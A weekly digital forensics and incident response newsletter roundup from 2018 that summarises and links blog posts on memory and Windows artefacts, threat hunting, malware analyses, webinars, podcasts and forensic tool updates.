FORENSIC ANALYSIS
- Matt at ‘Bit of Hex’ takes a look at the memory artefacts left behind by “a user running Tor Browser Bundle (TBB) on an external USB drive to access webmail, and a Tor hidden service.”
Memory Forensics &Tor - Igor and Oleg at Cyber Forensicator examine the artefacts created by the “pCloud desktop application – pCloud Drive”
Cloud Forensics: pCloud Drive - Brian Carrier at Cyber Triage demonstrates how to use Volatility within Cyber Triage to examine memory images.
Using Volatility in Cyber Triage to Analyze Memory - Oleg Skulkin and Igor Mikhaylov at Digital Forensics Corp demonstrate the new volatility integration in Magnet Forensics’ Axiom.
AXIOM V2: MEMORY FORENSICS - Jason Hale at Digital Forensics Stream examines the Microsoft-Windows-Partition/Diagnostic event log found on Win10 systems with respect to USB device tracking. Jason shows that Event ID 1006 contains not only the manufacturer, model, and serial number, but also the “volume boot record of a device that was connected to the system”
USB Device Tracking using the Partition/Diagnostic Event Log - Gary at Salt Forensics shares some initial testing of the new Win10 Timeline feature.
Windows 10 Timeline – Initial Review of Forensic Artefacts - SANS updated the Windows Forensic Analysis poster
Check out @chadtilbury’s Tweet - Andrea Fortuna at ‘So Long, and Thanks for All the Fish’ describes the basics of file carving and shares some resources on the topic.
Some thought about file carving - The Forensicator shares a metadata analysis of some of the word documents shared by Guccifer 2.
Did Guccifer 2 Plant his Russian Fingerprints? - Yogesh Khatri at Swift Forensics describes the bash session files found on MacOS since 10.11 (El Capitan). These look super useful compared to the standard bash history, which can get a bit confusing if a user has multiple terminal windows open at once.
Bash sessions in macOS (and why you need to understand its working)
THREAT INTELLIGENCE/HUNTING
- There’s a post on the Cloudy Forensics blog about detection of attacks using disk forensic techniques based on Mitre’s ATT&CK framework.
Forensic detection of MITRE ATT&CK Techniques - Adam at Hexacorn shows how to sideload a DLL by modifying a registry key associated with the Windows Address Book
wab.exe as a LOLBin - Tom Hegel at 401 TRG describes some recent attacks by Winnti Umbrella and describes its ties with the Chinese state intelligence apparatus
Burning Umbrella: An Intelligence Report on the Winnti Umbrella and Associated State-Sponsored Attackers - Colin at Red Flare Security describes some tools to simulate adversary attacks, as well as some common techniques that adversaries will use on a system/network.
Simulating Advanced Persistent Threat Group Activity - Pablo Delgado at Syspanda posted a few times this week
- The first shows how to “pull up-to-date threat events from your [McAfee] ePO database server into Elasticsearch from a Windows System”
Importing McAfee ePO Threat events to ELK - The second shows how to configure ELK to display login activity
Monitoring Active Directory with ELK - The last shows how to label endpoints with logstash to make “it much easier to identify abnormal behavior”
Labeling endpoint actions with Logstash – Threat Hunting
- The first shows how to “pull up-to-date threat events from your [McAfee] ePO database server into Elasticsearch from a Windows System”
UPCOMING WEBINARS/CONFERENCES
- Yuri Gubanov at Belkasoft is hosting a webinar on Instant Messenger Forensics on May 8. “The webinar will cover several most popular messengers like WhatsApp, Telegram, SnapChat and Skype. We will also discuss SQLite and RAM forensics and review how Belkasoft Evidence Center (BEC) can help you with chat forensics.”
Belkasoft Webinar Registration - Joshua James at Digital Forensic Science advises that the CFP for ICDF2C 2018 has been extended.
ICDF2C 2018 Extended Call for Papers
PRESENTATIONS/PODCASTS
- Blackbag Technologies showcase Windows memory analysis using Blacklight.
Windows RAM Analysis - Michael and Brian hosted Lesley Carhart on the Brakeing Down Incident Response podcast.
BDIR Episode – 003 - Sarah Edwards shared her slides from her recent BSides Baltimore presentation titled “Getting Saucy with APFS”
Getting Saucy with APFS - Joshua James at Digital Forensic Science demonstrates “how to do in-place file hash comparison from a disk image” using the Sleuthkit and CoreUtils. Joshua also posted a video on how to Bulk hash search with Sleuthkit hfind
In-place Hash Comparison with Sleuthkit and CoreUtils on Windows - Matt Shannon at F-Response shares a video showing how to access a bitlockered drive remotely using F-Response and dislocker.
Accessing a remote Bitlocker volume thanks to F-Response and Dislocker - Marcos at ‘Follow The White Rabbit’ shared his (Spanish) presentation slides from CONPilar18 on USB Device Forensics
#DFIR: Piénsatelo dos veces antes de meterla – (Gracias, @CONPilarZgz) - Dave and Matthew hosted Maxime Lamothe-Brassard and Nicole Ibrahim on the Forensic Lunch. Nicole discussed her research into ETL files that she’ll be presenting at the DFIR Summit, and Maxime showcased LimaCharlie.
Forensic Lunch: 5/4/18 - OALabs have uploaded a video showing how to use “the IDA Pro debugger and some API hooks to unpack a Visual Basic (VB6) packed sample”.
Unpacking VB6 Packers With IDA Pro and API Hooks (Re-Upload) - On this week’s Digital Forensic Survival Podcast, Michael talked about his go-to prefetch parsing tools.
DFSP # 115 – Prefetch Tools - Richard Davis at 13Cubed shows how to parse Event Logs using Microsoft Log Parser
Event Log Forensics with Log Parser - SANS shared Rebekah Brown’s presentation from the 2018 CTI Summit titled “Information Anarchy: A Survival Guide for the Misinformation Age”
Information Anarchy: A Survival Guide for the Misinformation Age – SANS CTI Summit 2018 - Didier Stevens was interviewed on the InfoSec Campus SecTools podcast
SecTools E02 with Didier Stevens - I recorded my ‘this month in 4n6’ podcast for April.
This Month In 4n6 – April – 2018
MALWARE
- Arbor’s Security Engineering & Response Team provide details of some recent attacks linked to Fancy Bear using the Lojack agent.
Lojack Becomes a Double-Agent - Check Point Research share some information about an active crypto mining operation distributing CryptoNote and XMRig.
A Crypto Mining Operation Unmasked - Nadav Avital, Matan Lion, and Ron Masas at Incapsula describe a “cryptojacking technique [where the attackers have distributed] the mining effort beyond the targeted web application servers and internal network and reaching future visitors of the attacked web applications.”
Crypto Me0wing Attacks: Kitty Cashes in on Monero - There were a couple of posts on the Malwarebytes Labs blog this week
- Vasilios Hioureas examines a sample of the Spartacus ransomware.
Spartacus ransomware: introduction to a strain of unsophisticated malware - They also wrote an article about the use of malicious Internet shortcut (URL) files by the Necurs botnet.
Internet Shortcut used in Necurs malspam campaign
- Vasilios Hioureas examines a sample of the Spartacus ransomware.
- Yanhui Jia, Matt Tennis, Yi Ren and Rongbo Shao at Palo Alto Networks show the effects of the POC drupalgeddon2 code exploiting CVE-2018-7600
Exploit in the Wild: #drupalgeddon2 – Analysis of CVE-2018-7600 - Sandfly Security describe “a clever use of default system commands to embed a covert channel malicious script inside a file that looks like an ordinary jpg or png file at first glance.”
Linux Malware Persistence with Cron - There were a couple of posts on the SANS Internet Storm Centre Handler Diaries this week
- Xavier Mertens shares a maldoc generator found on Pastebin
Diving into a Simple Maldoc Generator, (Tue, May 1st) - Renato Marinho examines a sample exploiting CVE-2018-2628.
WebLogic Exploited in the Wild (Again), (Thu, May 3rd)
- Xavier Mertens shares a maldoc generator found on Pastebin
- There were a couple of posts on the TrendLabs blog this week
- Joseph C Chen examines the FacexWorm Chrome extension.
FacexWorm Targets Cryptocurrency Trading Platforms, Abuses Facebook Messenger for Propagation - They also examine a sample of the Blackheart ransomware, “which drops and executes the legitimate tool known as AnyDesk alongside its malicious payload”
Legitimate Application AnyDesk Bundled with New Ransomware Variant
- Joseph C Chen examines the FacexWorm Chrome extension.
MISCELLANEOUS
- Alexis Brignoni has started a new blog translating DFIR articles into Spanish for those that need it. He has put out a call to the community to contribute articles and hopefully can help the readers build up their capabilities.
Check out @AlexisBrignoni’s Tweet! - Ashley Hernandez at Blackbag Technologies demonstrates how to use the “Gray to Black” application “to prepare a GrayKey zip for ingestion into BlackLight or Mobilyze.”
Gray To Black: Analyzing Graykey Images In Blacklight Or Mobilyze - There were a couple of posts on the CCL blog this week
- Richard Walker made comment about a recent examination that they had conducted on a mobile device. Thinking out loud, it would be good to look into the different PDF viewers on iOS/Android and see which ones store recently accessed document lists.
Mobile Device Lab – Defence Case Examination - Alex Caithness walks through some of the testing that has been done on the new Timeline feature in the recent Windows 10 update.
Windows 10 Timeline Forensic Artefacts
- Richard Walker made comment about a recent examination that they had conducted on a mobile device. Thinking out loud, it would be good to look into the different PDF viewers on iOS/Android and see which ones store recently accessed document lists.
- Brett Shavers at DFIR.Training comments of methods of identifying the right tool for your circumstances.
The Best DFIR tools - There’s a post on the Finding Vulnerabilities blog on how to enable logging in PowerShell 5 for Windows 7.
Enabling Powershell 5 LOGGING for Windows 7 - Johann Hofmann at Griffeye discusses the “limitations for investigators working in silos”. He explains that “a collaborative and integrated approach that will help teams move through their cases quickly is as important as building great tools in the first place”
Using technology to get results: Think outside the silo - Christa Miller at Magnet Forensics posted the answers to further questions asked about the connections feature of Axiom.
Connections in Magnet AXIOM Q&A Part 2 - Scar de Courcier describes her experience with publishing a book recently and gives some advice for those looking to do the same in the future.
Finding A Publisher For Your Book
SOFTWARE UPDATES
- Berla released iVe v2.0 and iVe Mobile v2.0. They have added support for Audi systems, as well as better integration with iVe Mobile. They also put together a few spotlights of some of the features.
- Cellebrite updated their UFED line to v7.4 to fix some bugs and update app support. The release notes aren’t online to link to.
- CRU updated their WriteBlocking Validation Utility to version 2.0.0.2.
Download WriteBlocking Validation Utility - Eric Zimmerman updated his Amcache parser to v1.0.0.2 and TimelineExplorer to v0.8.0.2.
TLE and Amcache parser - ExifTool 10.95 (development) was released with some new tags and bug fixes.
ExifTool 10.95 - GetData updated Forensic Explorer to v4.3.5.7342 to fix a bug.
01 May 2018 – v4.3.5.7342 - Microsystemation have released XRY 7.7.1, adding support for GrayKey extractions, as well as additional app and device decoding.
Now released: XRY 7.7.1, plus Kiosk and Tablet 7.7.1 - Ryan Benson released Hindsight v2.2, adding “parsing of more preference items and support for newer versions of Chrome”
Hindsight v2.2 Released – Preference Items - X-Ways Forensics 19.7 Preview 2b was released with a number of new improvements and bug fixes. This update also includes APFS parsing.
X-Ways Forensics 19.7 Preview 2b
And that’s all for Week 18! If you think I’ve missed something, or want me to cover something specifically hit me up through the contact page or on the social pipes!
This Week In 4n6 
Thanks for the shout-out! 🙂
LikeLike